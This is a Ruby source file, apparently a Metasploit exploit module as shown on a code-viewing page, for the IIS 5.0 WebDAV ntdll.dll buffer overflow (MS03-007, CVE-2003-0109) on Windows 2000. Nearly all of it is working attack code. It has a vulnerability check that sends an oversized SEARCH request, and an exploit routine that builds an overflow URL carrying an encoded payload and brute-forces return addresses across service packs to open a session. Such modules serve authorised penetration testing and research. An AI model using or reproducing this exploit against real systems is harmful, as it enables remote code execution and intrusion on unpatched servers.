169 lines
3.7 KiB
Ruby
169 lines
3.7 KiB
Ruby
|
require 'msf/core'
|
||
|
|
||
|
module Msf
|
||
|
|
||
|
class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||
|
|
||
|
include Exploit::Remote::Tcp
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'IIS 5.0 WebDAV ntdll.dll Overflow',
|
||
|
'Description' => %q{
|
||
|
This exploits a buffer overflow in NTDLL.dll on Windows 2000
|
||
|
through the SEARCH WebDAV method in IIS. This particular
|
||
|
module only works against Windows 2000. It should have a
|
||
|
reasonable chance of success against any service pack.
|
||
|
|
||
|
},
|
||
|
'Author' => [ 'hdm' ],
|
||
|
'Version' => '$Revision$',
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'OSVDB', '4467'],
|
||
|
[ 'MSB', 'MS03-007'],
|
||
|
[ 'CVE', '2003-0109'],
|
||
|
[ 'MIL', '28'],
|
||
|
|
||
|
],
|
||
|
'Privileged' => false,
|
||
|
'Payload' =>
|
||
|
{
|
||
|
'Space' => 512,
|
||
|
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
|
||
|
|
||
|
},
|
||
|
'Targets' =>
|
||
|
[
|
||
|
[
|
||
|
'Automatic Brute Force',
|
||
|
{
|
||
|
'Platform' => 'win',
|
||
|
},
|
||
|
],
|
||
|
],
|
||
|
'DisclosureDate' => 'May 30 2003',
|
||
|
'DefaultTarget' => 0))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
Opt::RPORT(80)
|
||
|
], self)
|
||
|
end
|
||
|
|
||
|
|
||
|
def check
|
||
|
connect
|
||
|
|
||
|
url = 'x' * 65535
|
||
|
|
||
|
xml =
|
||
|
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
||
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||
|
|
||
|
req =
|
||
|
"SEARCH /#{url} HTTP/1.1\r\n" +
|
||
|
"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +
|
||
|
"Content-Type: text/xml\r\n" +
|
||
|
"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"
|
||
|
|
||
|
sock.put(req)
|
||
|
res = sock.get_once
|
||
|
disconnect
|
||
|
|
||
|
if (res =~ /Server Error\(exception/)
|
||
|
return Exploit::CheckCode::Vulnerable
|
||
|
end
|
||
|
|
||
|
# Did the server stop acceping requests?
|
||
|
begin
|
||
|
connect
|
||
|
rescue => e
|
||
|
return Exploit::CheckCode::Vulnerable
|
||
|
end
|
||
|
|
||
|
disconnect
|
||
|
return Exploit::CheckCode::Safe
|
||
|
end
|
||
|
|
||
|
def exploit
|
||
|
|
||
|
# The targets in the most likely order they will work
|
||
|
targets =
|
||
|
[
|
||
|
# Almost Targetted :)
|
||
|
"\x4f\x4e", # =SP3
|
||
|
"\x41\x42", # ~SP0 ~SP2
|
||
|
"\x41\x43", # ~SP1, ~SP2
|
||
|
|
||
|
# Generic Bruteforce
|
||
|
"\x41\xc1",
|
||
|
"\x41\xc3",
|
||
|
"\x41\xc9",
|
||
|
"\x41\xca",
|
||
|
"\x41\xcb",
|
||
|
"\x41\xcc",
|
||
|
"\x41\xcd",
|
||
|
"\x41\xce",
|
||
|
"\x41\xcf",
|
||
|
"\x41\xd0",
|
||
|
]
|
||
|
|
||
|
xml =
|
||
|
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
||
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||
|
|
||
|
targets.each { |ret|
|
||
|
conn = connect_server
|
||
|
return if not conn
|
||
|
|
||
|
url = 'A' * 65516
|
||
|
print_status(sprintf("Trying return address 0x%.8x...", Rex::Text.to_unicode(ret).unpack('V')[0]))
|
||
|
|
||
|
url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
|
||
|
url[ 283, 2 ] = ret
|
||
|
|
||
|
req =
|
||
|
"SEARCH /#{url} HTTP/1.1\r\n" +
|
||
|
"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +
|
||
|
"Content-Type: text/xml\r\n" +
|
||
|
"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"
|
||
|
|
||
|
print_status("Sending request of #{req.length.to_s} bytes...")
|
||
|
|
||
|
begin
|
||
|
sock.put(req)
|
||
|
handler
|
||
|
disconnect
|
||
|
rescue => e
|
||
|
# print_status("Exception: #{e.to_s}")
|
||
|
end
|
||
|
|
||
|
1.upto(8) { |i|
|
||
|
select(nil, nil, nil, 0.25)
|
||
|
return if self.session_created?
|
||
|
}
|
||
|
}
|
||
|
end
|
||
|
|
||
|
# Try connecting to the server up to 20 times, with a two second gap
|
||
|
# This gives the server time to recover after a failed exploit attempt
|
||
|
def connect_server
|
||
|
print_status("Connecting to the IIS service...")
|
||
|
1.upto(20) {|i|
|
||
|
begin
|
||
|
connect
|
||
|
rescue => e
|
||
|
print_status("Connection failed (#{i.to_s}/20)...")
|
||
|
select(nil, nil, nil, 2)
|
||
|
next
|
||
|
end
|
||
|
return sock
|
||
|
}
|
||
|
print_status("Giving up, IIS must have completely crashed.")
|
||
|
return
|
||
|
end
|
||
|
|
||
|
end
|
||
|
end
|